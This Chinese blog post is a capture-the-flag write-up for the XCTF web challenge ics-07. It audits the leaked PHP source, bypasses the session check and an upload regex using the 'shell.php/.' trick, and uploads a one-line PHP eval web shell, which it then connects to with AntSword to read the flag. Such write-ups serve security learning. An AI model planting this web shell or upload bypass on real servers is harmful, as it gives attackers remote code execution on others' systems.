【攻防世界WEB】难度五星15分进阶题:ics-07

最新推荐文章于 2024-04-15 10:47:16 发布
最新推荐文章于 2024-04-15 10:47:16 发布
阅读量606 收藏 5
点赞数 2
分类专栏: # 攻防世界WEB 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125951654
版权
本文详细解析了一个涉及PHP源码分析、文件上传漏洞及SQL注入的网络安全问题。作者通过分析代码流程,发现了文件上传路径及利用条件,并成功上传了一句话木马。最终,利用蚁剑或冰蝎等工具连接服务器,找到并展示了flag。
摘要由CSDN通过智能技术生成

二、ics-07

 

解题方法:

1、php源码分析,文件上传漏洞,一句话木马

过程:

robots.txt什么都没有

 

那随便点,只有这个云平台管理中心可以进去

后面还进行了传参

判断是否存在字符型注入

都加上了单/双引号各一个

都没有报错

判断是否存在数字型注入

and 1=1

and 1=2

发现等号是被编码了

还有一个view-source按钮

点击之后出来源码了

 

对源码进行分析:

代码1:

isset() 函数:检测变量是否已设置并且非 NULL

show_source()函数:对文件进行语法高亮显示

header() 函数:向客户端发送原始的 HTTP 报头

 page传参不能为空(为空就die)

page传参不能有index.php,只能包含flag.php

代码2:

preg_match 函数:执行一个正则表达式匹配

chdir() 函数:改变当前的目录,需规定新目录

fopen() 函数:打开文件或者 URL(并伴随权限)

fwrite () 函数:向文件写入字符串,成功返回写入的字符数,否则返回 FALSE

fclose() 函数:关闭文件

 流程是:

1、先传入

2、进行正则过滤

3、改变目录

4、打开文件

5、写入文件

6、关闭文件

(这有不就是文件上传漏洞嘛,上传一句话木马,或者图片马)

且上传的路径为/uploaded/backup/

代码3:

floatval():返回变量的浮点值

substr():截取,这里是截取id的最后以为 必须是9

mysql_real_escape_string() :转义 SQL 语句中使用的字符串中的特殊字符

mysql_query() :执行一条 MySQL 查询

mysql_fetch_object() :从结果集(记录集)中取得一行作为对象

如果输入正确的话,会返回id和user(即是admin)

id:浮点值不为1,并且最后一位要是9,且是字符串(这就特别多了)

前面分析得到:page=flag.php

 获得

id=1

name=admin

思路:

这里最重要的就是达到$_SESSION['admin'] = True

然后再能进行文件上传(上传一句话木马)

然后蚁剑(冰蝎,菜刀)连接

找到flag

发现登录进去并获得id,name了,但是并未跳转到upload页面

(可能是不会显示出来)

尝试POST上传一句话木马

通过代码2中传入的参数,知道是使用con和file

payload:

con=<?php eval($_POST['1']);?>&file=shell.php/.

 

再连接(代码2中知道上传到/uploaded/backup/下)

61.147.171.105:57480/uploaded/backup/shell.php/

 连接进来了

 在html中找到flag.php

 

 cyberpeace{d2f720b48b37fca33797773be4a3c755}

黑色地带(崛起)
关注
专栏目录
[xctf]ics-07攻防世界(代码审计 + 正则 + 文件上传)
qq_37301470的博客
11-20 495
Ics -07 攻防世界 代码审计 + 正则 + 文件上传 + 登录session 源代码已经给出 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start(); if (!iss
攻防世界 web高手进阶区 8 ics-02
闵行小鱼塘
10-04 622
继续ctf的旅程,开始攻防世界web高手进阶区的8,本文是ics-02的writeup
攻防世界----ics-07
qq_44418229的博客
07-26 458
攻防世界---ics-07 析源码+正则
攻防世界 ics-07
CyhDl666的博客
02-24 499
ics-07 hint:工控云管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
攻防世界ics-07
最新发布
wangzhemvp的博客
04-15 619
session 的工作机制是:为每个访客创建一个唯一的 id (UID),并基于这个 UID 来存储变量。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/..进入的是1.php文件夹。匹配 ".php"、".php3"、".php4"、".php5"、".php7"、".phpt" 或 ".phtml" 结尾的文件名。(1)if ($_SESSION['admin']):判断 session 中的 admin 是否有值。一个点调用最后面的文件,两个点调用第一个文件。
攻防世界CTF | WP】ics-07
ethan18的博客
02-01 2229
攻防世界CTF | WP】ics-07目思路查看界面 目 思路 查看界面 打开目,我们可以看到一个只有项目管理界面可以进行操作的网站,项目管理界面如下 我们看到有一个源代码链接,点击链接的源代码如下 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) &&
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4634
尝试
攻防世界 web高手进阶区 6ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 856
继续ctf的旅程,攻防世界web高手进阶区的6ics-07、unfinish、i-got-id-200
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4619
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
攻防世界 web高手进阶区 10 biscuiti-300
闵行小鱼塘
11-07 1075
继续ctf的旅程,开始攻防世界web高手进阶区的10,本文是biscuiti-300的writeup
攻防世界:XCTF:ics-07
末初的CSDN博客
03-13 569
点击view-source,源码如下: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_st...
攻防世界ics-07 wp
freerats的博客
06-14 351
打开容器,看到view-source,点进去可以看到源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else { he
攻防世界xctf writeup ics-07
qq_43370221的博客
04-20 728
文章目录xctf_writeup_ics-07审计代码审计写入文件代码构造最后的payload菜刀连接的到webshell xctf_writeup_ics-07 审计代码 浏览页面 发现了view-source链接 ,接下来审计代码 if (!isset($_GET[page])) { show_source(__FILE__); die(); }...
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 1069
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答环境不太稳定,我这篇没有做到最后一步...
攻防世界-ics-07
m0_47571887的博客
11-21 2168
之前遇到过类似的,考的sql注入,不过这个考的文件上传 打开目,还是一个工控系统,继续按流程走,瞎点看看哪个能点开,最后只有项目管理才能点开. 看到有个view-source,点进去看一看,有三段代码,我们来析。 提交page参数,不能包含index.php,只能包含flag.php 提交con和file参数,更改backup路径为uploaded,if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i',$filename))还对这些字符进行了..
【愚公系列】2023年06月 攻防世界-Webics-07
时光隧道
06-15 4170
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界 ics-07
qq_43622442的博客
03-05 1513
攻防世界 ics-07 写在txt里当笔记太不方便了= =以后还是写这儿吧 1.打开首页是这样子 2.看那个提示,一开始我还以为是直接view-source,没想到那个是个超链接= =点它,出现源码 3.审计一下,利用点在这儿: 4.但是session我们无法自己伪造,看下面的代码: 5.看到sql就想注入= =但是这里宽字节并不行。看一下这句,只要result有值我们就可以上传文件了...
xctf攻防世界 Web高手进阶ics-07
l8947943的博客
01-01 630
1. 进入场景,查看环境 一顿狂点,项目管理可以打开,如图: 看到这个view-source,可以戳进去查看源码,如图: 2. 析问 这个还是很中规中矩的,登录界面随便填写,查看url中的变化 也就是说page和id将会是解的重要参数。 开始析代码 <?php if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else {
攻防世界web进阶ics-07
gongjingege的博客
08-14 453
目描述:工控云管理系统项目管理页面解析漏洞 打开靶机 根据目描述,点击项目管理 点击view-source可以查看源码 大概有三部 1, <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值